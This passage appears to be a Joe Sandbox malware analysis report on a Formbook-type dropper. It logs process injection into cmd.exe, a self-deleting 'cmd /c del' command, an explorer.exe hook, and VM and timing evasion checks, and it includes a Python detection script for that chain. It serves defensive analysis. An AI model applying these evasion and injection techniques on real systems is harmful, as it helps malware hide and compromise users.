Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E5E824
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E41002
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DAA830
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DA99BF
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D8F900
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DA4120
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E522AE
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E3FA2B
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E4DBD2
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E403DA
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DBEBB0
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DAAB40
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E52B28
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E4D466
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D9841F
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E525DD
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D9D5E0
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DB2581
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E51D55
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E52D07
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D80D20
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E52EF7
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DA6E30
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E4D616
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E51FF1
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E5DFCE
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: String function: 01192400 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: String function: 01194599 appears 38 times
Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 00D8B150 appears 72 times
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041A360 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041A410 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041A490 NtClose,
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041A540 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041A35A NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041A40A NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041A53A NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC98F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC98A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DCB040 NtSuspendThread,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC99D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9A10 NtQuerySection,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9A20 NtResumeThread,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DCA3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC95F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9560 NtWriteFile,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DCAD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9660 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC97A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DCA770 NtOpenThread,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9760 NtOpenProcess,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DCA710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC9730 NtQueryVirtualMemory,
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\fdvucso.exe 3D9400A6D9CA60C3BBE4212BA2727924E086A41CD2634D5CE1C4B8D9EE02F9DD
Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Virustotal: Detection: 41%
Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exe | ReversingLabs: Detection: 43%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe
Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Process created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Process created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Process created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Process created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
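The process-creation lines above describe a chain that is detectable from process telemetry alone, without any memory scanning: the dropper in %TEMP% re-launches itself with the same command line (the hollowed child), explorer.exe starts a 32-bit cmd.exe from SysWOW64 with no arguments (the injection target), and that cmd.exe spawns a second cmd.exe whose only job is to delete the dropper. The following Python is an added example, not Joe Sandbox output, showing those three rules and the chained alert run over constructed events that mirror the report's process tree. The PIDs, the parent of explorer.exe and the event shape are assumptions; the report does not list them, and a real deployment would read Sysmon Event ID 1 or equivalent EDR records instead of the inline list.

```python
"""Process-tree detection for the Formbook launch sequence on this page.
Added example: the events below are constructed to mirror the report's
"Process created" lines; PIDs are invented, the report does not list them."""
from dataclasses import dataclass
import ntpath
import re


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str
    command_line: str


# Constructed telemetry mirroring the report's process tree (PIDs assumed)
SAMPLE_EVENTS = [
    ProcessEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(4100, 1000, r"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe",
                 r'"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe"'),
    ProcessEvent(4200, 4100, r"C:\Users\user\AppData\Local\Temp\fdvucso.exe",
                 r"C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp"),
    ProcessEvent(4300, 4200, r"C:\Users\user\AppData\Local\Temp\fdvucso.exe",
                 r"C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp"),
    ProcessEvent(4400, 1000, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe"),
    ProcessEvent(4500, 4400, r"C:\Windows\SysWOW64\cmd.exe",
                 r'/c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"'),
    ProcessEvent(4600, 4500, r"C:\Windows\System32\conhost.exe",
                 r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

_DEL_RE = re.compile(r'/c\s+del\s+"?([^"]+\.exe)"?', re.IGNORECASE)
_TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def _basename(path):
    return ntpath.basename(path).lower()


def detect(events):
    """Return (rule_name, pid) findings in event order."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        # Rule 1: a process in %TEMP% re-launches itself with an identical command line
        if (parent and _TEMP_RE.search(e.image)
                and parent.image.lower() == e.image.lower()
                and parent.command_line == e.command_line):
            findings.append(("temp_self_respawn", e.pid))
        # Rule 2: explorer.exe starts a SysWOW64 binary with no arguments at all
        if (parent and _basename(parent.image) == "explorer.exe"
                and "\\syswow64\\" in e.image.lower()
                and e.command_line.strip().strip('"').lower() == e.image.lower()):
            findings.append(("explorer_spawns_bare_syswow64", e.pid))
        # Rule 3: cmd.exe /c del of an executable under %TEMP% (self-deletion)
        m = _DEL_RE.search(e.command_line)
        if _basename(e.image) == "cmd.exe" and m and _TEMP_RE.search(m.group(1)):
            findings.append(("cmd_deletes_temp_exe", e.pid))
    return findings


def chained_alert(events):
    """True when the self-delete cmd.exe is a child of a bare SysWOW64 process
    that explorer.exe started: the full sequence from the report."""
    by_pid = {e.pid: e for e in events}
    hits = {}
    for name, pid in detect(events):
        hits.setdefault(name, set()).add(pid)
    return any(by_pid[pid].ppid in hits.get("explorer_spawns_bare_syswow64", set())
               for pid in hits.get("cmd_deletes_temp_exe", set()))


if __name__ == "__main__":
    for name, pid in detect(SAMPLE_EVENTS):
        print(f"{name:<32} pid={pid}")
    print("chained Formbook sequence:", chained_alert(SAMPLE_EVENTS))
```

Each rule on its own has benign look-alikes (installers re-launch themselves, and scripts delete temporary executables), so the chained form is the one worth paging on; the individual findings are better kept as low-severity context for the hunt.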
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Code function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | File created: C:\Users\user\AppData\Local\Temp\nscCE76.tmp
Source: classification engine | Classification label: mal100.troj.evad.winEXE@9/4@4/2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Code function: 0_2_004021AA CoCreateInstance,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Code function: 0_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3376:120:WilError_01
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\lmwlf\ciwera\wcsu\ec524832ab3648f5b1c9c3185cc05774\hsjgbq\tqrenmhx\Release\tqrenmhx.pdb source: SecuriteInfo.com.Variant.Jaik.72878.10638.exe, 00000000.00000002.454080692.0000000000789000.00000004.00000001.01000000.00000003.sdmp, fdvucso.exe, 00000001.00000000.430396179.000000000119E000.00000002.00000001.01000000.00000004.sdmp, fdvucso.exe, 00000001.00000002.440272687.000000000119E000.00000002.00000001.01000000.00000004.sdmp, fdvucso.exe, 00000002.00000000.433738219.000000000119E000.00000002.00000001.01000000.00000004.sdmp, cmd.exe, 0000000D.00000002.695116331.000000000335F000.00000004.10000000.00040000.00000000.sdmp, nsmCEB5.tmp.0.dr, fdvucso.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: fdvucso.exe, 00000001.00000003.438551302.000000001A540000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000001.00000003.434608426.000000001A6D0000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515050798.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.441575692.0000000001354000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.439819748.00000000011B4000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515766558.000000000160F000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694158511.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.515945671.0000000000BC9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.514406903.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694414486.0000000000E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: fdvucso.exe, 00000002.00000002.516194872.0000000003200000.00000040.10000000.00040000.00000000.sdmp, fdvucso.exe, 00000002.00000003.513191387.0000000001041000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694963571.0000000001100000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000D.00000000.513997856.0000000001100000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: fdvucso.exe, 00000001.00000003.438551302.000000001A540000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000001.00000003.434608426.000000001A6D0000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515050798.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.441575692.0000000001354000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.439819748.00000000011B4000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515766558.000000000160F000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694158511.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.515945671.0000000000BC9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.514406903.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694414486.0000000000E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: fdvucso.exe, 00000002.00000002.516194872.0000000003200000.00000040.10000000.00040000.00000000.sdmp, fdvucso.exe, 00000002.00000003.513191387.0000000001041000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694963571.0000000001100000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000D.00000000.513997856.0000000001100000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 1_2_01192445 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_00417811 push cs; ret
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041E9F4 push ds; ret
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_00416495 push edx; retf
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041D4B5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041D56C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041D502 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_0041D50B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_01192445 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DDD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | File created: C:\Users\user\AppData\Local\Temp\fdvucso.exe (dropped file)

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEE
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 1_2_01191890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 0000000000169904 second address: 000000000016990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 0000000000169B7E second address: 0000000000169B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 7092 | Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe TID: 6824 | Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | API coverage: 4.4 %
          Source: C:\Windows\SysWOW64\cmd.exe | API coverage: 4.1 %
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Code function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Code function: 0_2_004069A4 FindFirstFileW,FindClose
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | Code function: 0_2_0040290B FindFirstFileW
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe | API call chain: ExitProcess graph end node
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | API call chain: ExitProcess graph end node
          Source: explorer.exe, 00000005.00000000.477575107.000000000807B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.492546871.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.477575107.000000000807B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
          Source: explorer.exe, 00000005.00000000.477575107.000000000807B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.493068210.0000000007F92000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.472921591.0000000006900000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.478996643.00000000081C3000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}$$&2=
          Source: explorer.exe, 00000005.00000000.477575107.000000000807B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.493068210.0000000007F92000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.494782734.00000000081C3000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 1_2_01191D2C _memset,IsDebuggerPresent
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 1_2_0119558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
